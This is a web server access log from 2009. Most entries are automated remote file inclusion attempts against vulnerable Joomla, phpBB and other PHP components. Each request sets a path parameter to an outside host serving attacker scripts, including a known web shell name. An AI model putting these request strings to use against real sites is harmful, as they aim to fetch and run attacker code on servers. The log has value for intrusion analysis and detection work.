211.203.180.144 - - [16/Sep/2009:12:50:52 -0700] "GET /logs/access_080602.log/index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.203.180.144 - - [16/Sep/2009:12:50:53 -0700] "GET /logs/access_080602.log/mosConfig_absolute_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.203.180.144 - - [16/Sep/2009:12:50:55 -0700] "GET /logs/access_080626.log/index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.203.180.144 - - [16/Sep/2009:12:50:55 -0700] "GET /logs/access_080626.log/mosConfig_absolute_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.251.142.142 - - [16/Sep/2009:12:51:21 -0700] "GET /components/com_hashcash/server.php?mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.251.142.142 - - [16/Sep/2009:12:51:21 -0700] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.251.142.142 - - [16/Sep/2009:12:51:21 -0700] "GET /logs/access_080109.log//components/com_hashcash/server.php?mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.6.18.216 - - [16/Sep/2009:12:51:22 -0700] "GET /bikes/dteel/DesertSTOC07/ HTTP/1.0" 200 7603 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
218.166.194.142 - - [16/Sep/2009:12:51:23 -0700] "GET /logs/access_090509.log HTTP/1.1" 200 983040 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.dmulk.com"
125.251.142.142 - - [16/Sep/2009:12:51:26 -0700] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.251.142.142 - - [16/Sep/2009:12:51:26 -0700] "GET /logs/access_080109.log%20%20//components/com_hashcash/server.php?mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.251.142.142 - - [16/Sep/2009:12:51:26 -0700] "GET /components/com_hashcash/server.php?mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.251.142.142 - - [16/Sep/2009:12:51:32 -0700] "GET /logs/access_080626.log//components/com_hashcash/server.php?mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.232.143.55 - - [16/Sep/2009:12:51:33 -0700] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.232.143.55 - - [16/Sep/2009:12:51:33 -0700] "GET /logs/access_080109.log%20%20//components/com_hashcash/server.php?mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.232.143.55 - - [16/Sep/2009:12:51:33 -0700] "GET /components/com_hashcash/server.php?mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.251.142.142 - - [16/Sep/2009:12:51:44 -0700] "GET /logs/access_080626.log%20%20//components/com_hashcash/server.php?mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.184.252.3 - - [16/Sep/2009:12:52:03 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.ybcyyy.com/data/zkjs/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.184.252.3 - - [16/Sep/2009:12:52:06 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.ybcyyy.com/data/zkjs/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.184.252.3 - - [16/Sep/2009:12:52:09 -0700] "GET /logs/access_080327.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.ybcyyy.com/data/zkjs/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.45.190.166 - - [16/Sep/2009:12:52:10 -0700] "GET /logs/access_080327.log%20%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.6.18.216 - - [16/Sep/2009:12:52:28 -0700] "GET /logs/access_090208.log HTTP/1.0" 200 2936449 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
58.184.252.3 - - [16/Sep/2009:12:52:28 -0700] "GET /logs/access_080529.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.ybcyyy.com/data/zkjs/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.4.8.14 - - [16/Sep/2009:12:52:55 -0700] "GET /logs/access_081107.log/////s_loadenv.inc.php?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.184.252.3 - - [16/Sep/2009:12:53:01 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.ybcyyy.com/data/zkjs/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.232.143.55 - - [16/Sep/2009:12:53:05 -0700] "GET /logs/access_080626.log%20%20//components/com_hashcash/server.php?mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.184.252.3 - - [16/Sep/2009:12:53:06 -0700] "GET /logs/access_080327.log%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.ybcyyy.com/data/zkjs/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.184.252.3 - - [16/Sep/2009:12:53:08 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.ybcyyy.com/data/zkjs/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.184.252.3 - - [16/Sep/2009:12:53:11 -0700] "GET /logs/access_080327.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.ybcyyy.com/data/zkjs/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.184.252.3 - - [16/Sep/2009:12:53:13 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.ybcyyy.com/data/zkjs/fx29id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [16/Sep/2009:12:53:15 -0700] "GET /logs/access_080501.log%20%20//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://karaoke.kerma-nn.ru/katalogm//.cache/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [16/Sep/2009:12:53:15 -0700] "GET /logs/access_090326.log%20%20//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://karaoke.kerma-nn.ru/katalogm//.cache/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.16.182.130 - - [16/Sep/2009:12:53:16 -0700] "GET /logs/access_080821.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.zebrahead.fr/img/id.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.184.252.3 - - [16/Sep/2009:12:53:31 -0700] "GET /logs/access_080529.log%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.ybcyyy.com/data/zkjs/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.251.142.142 - - [16/Sep/2009:12:54:28 -0700] "GET /components/com_joomlaboard/includes/database.php?mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.251.142.142 - - [16/Sep/2009:12:54:37 -0700] "GET /logs/access_080821.log//components/com_joomlaboard/includes/database.php?mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.251.142.142 - - [16/Sep/2009:12:54:37 -0700] "GET /logs//components/com_joomlaboard/includes/database.php?mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.251.142.142 - - [16/Sep/2009:12:54:38 -0700] "GET /logs/access_081107.log//components/com_joomlaboard/includes/database.php?mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.251.142.142 - - [16/Sep/2009:12:54:39 -0700] "GET /logs/access_080821.log%20%20//components/com_joomlaboard/includes/database.php?mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.251.142.142 - - [16/Sep/2009:12:54:39 -0700] "GET /logs//components/com_joomlaboard/includes/database.php?mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.251.142.142 - - [16/Sep/2009:12:54:39 -0700] "GET /components/com_joomlaboard/includes/database.php?mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.251.142.142 - - [16/Sep/2009:12:54:40 -0700] "GET /logs/access_081107.log%20%20//components/com_joomlaboard/includes/database.php?mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
147.202.47.222 - - [16/Sep/2009:12:55:19 -0700] "GET /logs/access_090514.log/index.php?option=com_wrapper&task=view&Itemid=&mosConfig_absolute_path=http://space.jpl.nasa.gov/analog.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.dmulk.com"
147.202.47.222 - - [16/Sep/2009:12:55:19 -0700] "GET /logs/index.php?option=com_wrapper&task=view&Itemid=&mosConfig_absolute_path=http://space.jpl.nasa.gov/analog.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.dmulk.com"
147.202.47.222 - - [16/Sep/2009:12:55:22 -0700] "GET /logs/access_090514.log/index.php?option=com_wrapper&task=view&Itemid=&mosConfig_absolute_path=http://space.jpl.nasa.gov/analog.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.dmulk.com"
147.202.47.222 - - [16/Sep/2009:12:55:22 -0700] "GET /logs/index.php?option=com_wrapper&task=view&Itemid=&mosConfig_absolute_path=http://space.jpl.nasa.gov/analog.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.dmulk.com"
147.202.47.222 - - [16/Sep/2009:12:55:22 -0700] "GET /index.php?option=com_wrapper&task=view&Itemid=&mosConfig_absolute_path=http://space.jpl.nasa.gov/analog.txt??%0D?? HTTP/1.1" 200 19842 "-" "libwww-perl/5.831" "www.dmulk.com"
147.202.47.222 - - [16/Sep/2009:12:55:23 -0700] "GET /index.php?option=com_wrapper&task=view&Itemid=&mosConfig_absolute_path=http://space.jpl.nasa.gov/analog.txt??%0D?? HTTP/1.1" 200 19842 "-" "libwww-perl/5.831" "www.dmulk.com"
147.202.47.222 - - [16/Sep/2009:12:55:27 -0700] "GET /logs/access_080916.log/index.php?option=com_wrapper&task=view&Itemid=&mosConfig_absolute_path=http://space.jpl.nasa.gov/analog.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.dmulk.com"
83.16.182.130 - - [16/Sep/2009:12:55:29 -0700] "GET /logs/access_080502.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.zebrahead.fr/img/id.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
147.202.47.222 - - [16/Sep/2009:12:55:30 -0700] "GET /logs/access_080916.log/index.php?option=com_wrapper&task=view&Itemid=&mosConfig_absolute_path=http://space.jpl.nasa.gov/analog.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.dmulk.com"
64.239.69.157 - - [16/Sep/2009:12:55:58 -0700] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.csjh.tpc.edu.tw/~afu//blog2/.../.../chokeng_blitars/.../revye/id1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.239.69.157 - - [16/Sep/2009:12:55:58 -0700] "GET /logs/access_090807.log%20%20/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.csjh.tpc.edu.tw/~afu//blog2/.../.../chokeng_blitars/.../revye/id1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.239.69.157 - - [16/Sep/2009:12:55:58 -0700] "GET /logs/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.csjh.tpc.edu.tw/~afu//blog2/.../.../chokeng_blitars/.../revye/id1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.239.69.157 - - [16/Sep/2009:12:56:01 -0700] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.csjh.tpc.edu.tw/~afu//blog2/.../.../chokeng_blitars/.../revye/id1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.239.69.157 - - [16/Sep/2009:12:56:02 -0700] "GET /logs/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.csjh.tpc.edu.tw/~afu//blog2/.../.../chokeng_blitars/.../revye/id1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.239.69.157 - - [16/Sep/2009:12:56:02 -0700] "GET /logs/access_090807.log/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.csjh.tpc.edu.tw/~afu//blog2/.../.../chokeng_blitars/.../revye/id1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:12:58:08 -0700] "GET /logs/access_081228.log HTTP/1.0" 200 65536 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:12:58:13 -0700] "GET /logs/access_080502.log HTTP/1.0" 200 4007803 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.53.96.178 - - [16/Sep/2009:12:58:18 -0700] "GET /logs/access_080701.log//components/com_sef/sef.php?mosConfig_absolute_path=http://bulgariaunderscope.com/root/tukulid.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
74.53.96.178 - - [16/Sep/2009:12:58:18 -0700] "GET /logs//components/com_sef/sef.php?mosConfig_absolute_path=http://bulgariaunderscope.com/root/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
74.53.96.178 - - [16/Sep/2009:12:58:18 -0700] "GET /components/com_sef/sef.php?mosConfig_absolute_path=http://bulgariaunderscope.com/root/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
66.221.195.250 - - [16/Sep/2009:12:58:25 -0700] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.rainbow.by//data/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.221.195.250 - - [16/Sep/2009:12:58:26 -0700] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.rainbow.by//data/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.221.195.250 - - [16/Sep/2009:12:58:26 -0700] "GET /logs/access_080319.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.rainbow.by//data/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.221.195.250 - - [16/Sep/2009:12:59:16 -0700] "GET /logs/access_080819.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.rainbow.by//data/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.239.69.157 - - [16/Sep/2009:13:00:17 -0700] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~afu//blog2/.../.../chokeng_blitars/.../revye/id1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.239.69.157 - - [16/Sep/2009:13:00:17 -0700] "GET /logs/access_081114.log%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~afu//blog2/.../.../chokeng_blitars/.../revye/id1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.239.69.157 - - [16/Sep/2009:13:00:17 -0700] "GET /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~afu//blog2/.../.../chokeng_blitars/.../revye/id1.txt? HTTP/1.0" 200 19881 "-" "Mozilla/5.0" "www.dmulk.com"
58.184.252.3 - - [16/Sep/2009:13:00:24 -0700] "GET /logs/access_080702.log%20%20//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.ybcyyy.com/data/zkjs/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.184.252.3 - - [16/Sep/2009:13:00:26 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.ybcyyy.com/data/zkjs/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.184.252.3 - - [16/Sep/2009:13:00:29 -0700] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.ybcyyy.com/data/zkjs/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.102.57 - - [16/Sep/2009:13:00:31 -0700] "GET /errors.php?error=http://www.invasaohacking.com/r57.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:13:00:42 -0700] "GET /logs/access_080115.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.239.69.157 - - [16/Sep/2009:13:00:50 -0700] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~afu//blog2/.../.../chokeng_blitars/.../revye/id1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.239.69.157 - - [16/Sep/2009:13:00:50 -0700] "GET /logs/access_081114.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~afu//blog2/.../.../chokeng_blitars/.../revye/id1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.239.69.157 - - [16/Sep/2009:13:00:51 -0700] "GET /logs/access_081111.log%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~afu//blog2/.../.../chokeng_blitars/.../revye/id1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.239.69.157 - - [16/Sep/2009:13:00:51 -0700] "GET /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~afu//blog2/.../.../chokeng_blitars/.../revye/id1.txt? HTTP/1.0" 200 19881 "-" "Mozilla/5.0" "www.dmulk.com"
58.184.252.3 - - [16/Sep/2009:13:01:03 -0700] "GET /logs/access_090126.log%20%20//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.ybcyyy.com/data/zkjs/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.6.232.171 - - [16/Sep/2009:13:01:19 -0700] "GET /logs//main.php?inc=http://bulgariaunderscope.com/root/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.6.232.171 - - [16/Sep/2009:13:01:19 -0700] "GET /logs/access_081213.log//main.php?inc=http://bulgariaunderscope.com/root/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.6.232.171 - - [16/Sep/2009:13:01:19 -0700] "GET /main.php?inc=http://bulgariaunderscope.com/root/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.6.232.171 - - [16/Sep/2009:13:01:20 -0700] "GET /logs/access_080402.log//main.php?inc=http://bulgariaunderscope.com/root/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.6.232.171 - - [16/Sep/2009:13:01:21 -0700] "GET /main.php?inc=http://bulgariaunderscope.com/root/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.6.232.171 - - [16/Sep/2009:13:01:21 -0700] "GET /logs/access_081213.log//main.php?inc=http://bulgariaunderscope.com/root/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.18.236.8 - - [16/Sep/2009:13:01:21 -0700] "GET /logs/access_090209.log//pivot/modules/module_db.php?pivot_path=http://larrys.interfree.it/echos.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.18.236.8 - - [16/Sep/2009:13:01:21 -0700] "GET /pivot/modules/module_db.php?pivot_path=http://larrys.interfree.it/echos.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.6.232.171 - - [16/Sep/2009:13:01:21 -0700] "GET /logs//main.php?inc=http://bulgariaunderscope.com/root/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.6.232.171 - - [16/Sep/2009:13:01:22 -0700] "GET /logs/access_080402.log//main.php?inc=http://bulgariaunderscope.com/root/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
118.45.190.166 - - [16/Sep/2009:13:01:34 -0700] "GET /logs/access_090731.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.45.190.166 - - [16/Sep/2009:13:01:36 -0700] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.18.236.8 - - [16/Sep/2009:13:01:43 -0700] "GET /logs//pivot/modules/module_db.php?pivot_path=http://larrys.interfree.it/echos.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.18.236.8 - - [16/Sep/2009:13:01:43 -0700] "GET /logs/access_080611.log//pivot/modules/module_db.php?pivot_path=http://larrys.interfree.it/echos.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.239.69.157 - - [16/Sep/2009:13:01:45 -0700] "GET /logs/access_081111.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~afu//blog2/.../.../chokeng_blitars/.../revye/id1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.183.177.131 - - [16/Sep/2009:13:02:09 -0700] "GET /logs/access_080416.log%20%20/errors.php?error=http://www.semihow.com/sh/amboard/compile/default_basic/admin/mydb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.183.177.131 - - [16/Sep/2009:13:02:09 -0700] "GET /errors.php?error=http://www.semihow.com/sh/amboard/compile/default_basic/admin/mydb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.183.177.131 - - [16/Sep/2009:13:02:09 -0700] "GET /logs/errors.php?error=http://www.semihow.com/sh/amboard/compile/default_basic/admin/mydb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.183.177.131 - - [16/Sep/2009:13:02:09 -0700] "GET /logs/access_080614.log%20%20/errors.php?error=http://www.semihow.com/sh/amboard/compile/default_basic/admin/mydb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.10.136.56 - - [16/Sep/2009:13:02:39 -0700] "GET /logs/access_080313.log/index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path=http://philen.byroe.net/~arabhack/jurekznitip/scan/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.78.116.209 - - [16/Sep/2009:13:02:52 -0700] "GET /logs//main.php?inc=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.78.116.209 - - [16/Sep/2009:13:02:52 -0700] "GET /logs/access_080402.log%20%20//main.php?inc=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.78.116.209 - - [16/Sep/2009:13:02:52 -0700] "GET /logs/access_081213.log%20%20//main.php?inc=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.78.116.209 - - [16/Sep/2009:13:02:52 -0700] "GET /main.php?inc=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.6.18.216 - - [16/Sep/2009:13:02:57 -0700] "GET /bikes/dteel/CreSTOC08/?D=A HTTP/1.0" 200 6009 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
121.78.116.209 - - [16/Sep/2009:13:03:24 -0700] "GET /logs/access_081213.log//main.php?inc=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.78.116.209 - - [16/Sep/2009:13:03:24 -0700] "GET /logs/access_080402.log//main.php?inc=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
59.27.95.144 - - [16/Sep/2009:13:04:01 -0700] "GET /blend_data/blend_common.php?phpbb_root_path=http://www.jahanradio.com/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
59.27.95.144 - - [16/Sep/2009:13:04:06 -0700] "GET /logs//blend_data/blend_common.php?phpbb_root_path=http://www.jahanradio.com/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
